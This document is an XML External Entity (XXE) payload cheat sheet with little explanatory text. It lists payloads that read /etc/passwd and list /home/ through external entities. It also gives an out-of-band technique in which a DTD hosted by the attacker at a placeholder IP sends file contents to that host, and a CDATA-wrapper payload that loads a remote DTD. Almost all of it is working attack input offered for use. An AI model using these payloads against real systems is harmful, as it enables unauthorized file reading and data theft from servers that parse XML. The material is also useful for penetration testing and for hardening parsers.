XML External Entity (XXE)

Value Replacement

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Replaced">
]>
<Contact>
  <lastName>&lastname;</lastName>
  <firstName>Tom</firstName>
</Contact>

Retrieving files

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<Contact>
  <lastName>&lastname;</lastName>
  <firstName>Tom</firstName>
</Contact>

Reading directory content

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///home/">
]>
<Contact>
  <lastName>&lastname;</lastName>
  <firstName>Tom</firstName>
</Contact>

Out-of-band exploitation

Our dtd:

<!ENTITY % content SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM 'http://<your-ip>/out?%content;'>" >

Request:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://<your-ip>/external.dtd"> 
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>

CDATA Wrappers

In case of retrieving XML files, we should avoid any parsing issues using a wrapper.

Wrapper:

<!ENTITY wrapper "%start;%file;%end;">

Payload:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://<your-ip>/wrapper.dtd" >
%dtd;
]>
<Contact>
  <lastName>&wrapper;</lastName>
  <firstName>Tom</firstName>
</Contact>